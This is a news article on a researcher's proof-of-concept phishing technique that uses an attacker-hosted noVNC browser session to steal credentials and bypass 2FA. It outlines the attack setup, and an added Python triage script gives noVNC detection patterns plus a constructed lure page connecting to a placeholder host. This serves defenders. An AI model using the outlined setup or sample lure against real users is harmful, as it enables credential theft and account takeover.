
Novel phishing method deceives users with ubiquitous IT support tool

The man-in-the-middle attack can be used for a range of nefarious purposes, including credential theft and malicious code injection

A cyber security researcher has documented a novel phishing technique that involves cyber criminals harnessing virtual network computing (VNC) technology on a private server to launch a variety of attacks.

Using the open source noVNC client, the phishing technique allows successful attackers to launch malicious code into a victim’s browser, plant a keylogger, and passively observe all user activity.

The researcher, who goes by the name mr.d0x, claims the method of attack bypasses two-factor authentication (2FA), including Google’s 2FA protocol used for the likes of Gmail and Google accounts, and facilitates the stealing of credentials.

The phishing method effectively acts as a VNC client for the attacker to remotely monitor and access a user’s environment, creating a man-in-the-middle (MITM) attack.

The technology is common in modern businesses, with employees being familiar with IT support teams accessing their computers remotely to resolve technical issues. 

The initial deception is achieved in a typical phishing format: a strategically crafted email provides a link the user needs to click on. Once clicked, the user is connected directly to a server run by the attacker, rather than to a conventional malicious web page.

The attack can be launched against individuals using any browser, theoretically including ones on mobile devices, though the researcher said they had difficulty in executing the attack on smartphones.

There are some shortcomings with the method, the researcher said, including that the attacker has to hand the victim control of their own machine in order for the attack to work.

It’s also possible that given the nature of VNC software, there may be some noticeable input lag for the victim, offering an indication that the website is not legitimate.

This is currently a proof-of-concept style of phishing attack with no known actively exploited cases in the wild, though remote access to businesses is reportedly on the rise in a string of burgeoning dark web operations.

“Browsers are more powerful than ever and the usage of browsers as clients for remote access provides new ways for attackers to steal credentials, bypass 2FA, and more,” said the researcher. “I strongly believe that what I’ve demonstrated in this article is only a small portion of what this technique can be used for.”

noVNC attack breakdown

The attacker first needs to deploy a Linux machine via a cloud service provider; any provider or Linux distro is fine. Firefox is good for this, the researcher said, but any browser with a kiosk mode will also work.


Once the Linux instance is up and running, the attacker then needs to install VNC software such as TightVNC or TigerVNC before running some custom commands to ensure the environment is correctly configured for the attack. The noVNC JavaScript library and application can then be downloaded from GitHub and installed too.

A web browser needs to be running in the deployment and displaying the authentication page from which the attacker wants to steal credentials, such as Google’s login page. The attacker can use any browser (Firefox is good here), but it must be running in kiosk mode.

This technique is effective in spear phishing campaigns but will encounter issues if sent to multiple targets since they will be sharing the same VNC session. 

However, the technique can be modified and automated so different users access different VNC sessions by assigning users to different ports.
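From the defender's side, the distinguishing feature of this lure is that the victim's browser receives the noVNC client itself rather than an ordinary login form. The following is an added triage helper, not code from the article or from the researcher, that scans the HTML of a reported phishing URL for noVNC markers; the markers (the `rfb.js` module, the `RFB` class, a websockify-style WebSocket URL) are assumptions about noVNC's default layout, and both sample pages are constructed.

```python
import re
from dataclasses import dataclass

# Assumed noVNC fingerprints: the client ships core/rfb.js, is instantiated
# via `new RFB(container, websocketUrl)`, and normally talks to a websockify
# proxy over ws:// or wss://. None of these names come from the article.
INDICATORS = {
    "novnc_script": re.compile(
        r"""(?:<script[^>]+src=|import\s+\w+\s+from\s*)["'][^"']*(?:rfb\.js|novnc)""", re.I),
    "rfb_instance": re.compile(r"\bnew\s+RFB\s*\(", re.I),
    "vnc_websocket": re.compile(r"""wss?://[^"'\s]*(?:websockify|vnc)[^"'\s]*""", re.I),
}
# A login-themed title on a page that also carries a VNC client is the lure signature.
LOGIN_TITLE = re.compile(r"<title>[^<]*(?:sign\s*in|log\s*in|login)[^<]*</title>", re.I)


@dataclass
class Verdict:
    indicators: list
    login_lure: bool

    @property
    def suspicious(self) -> bool:
        # Two independent noVNC markers, or one marker on a login-themed page.
        return len(self.indicators) >= 2 or (len(self.indicators) == 1 and self.login_lure)


def scan_html(html: str) -> Verdict:
    """Return which noVNC indicators appear in a fetched page body."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    return Verdict(hits, bool(LOGIN_TITLE.search(html)))


# Constructed sample: what a browser would receive from a noVNC-based lure
# (203.0.113.10 is a documentation-range address, not a real host).
SAMPLE_PHISH = """<html><head><title>Sign in - Accounts</title></head>
<body><div id="screen"></div>
<script type="module">
import RFB from './core/rfb.js';
const rfb = new RFB(document.getElementById('screen'), 'wss://203.0.113.10:6080/websockify');
</script></body></html>"""

# Constructed sample: an ordinary login form with no remote-desktop client.
SAMPLE_BENIGN = """<html><head><title>Log in</title></head>
<body><form action="/login" method="post">
<input name="user"><input name="pass" type="password"><button>Log in</button>
</form></body></html>"""

if __name__ == "__main__":
    for label, page in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        v = scan_html(page)
        print(label, v.suspicious, v.indicators)
```

A page with a visible login title but no form fields and a live WebSocket to a VNC proxy is worth escalating even when the lure domain is newly registered and otherwise clean.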
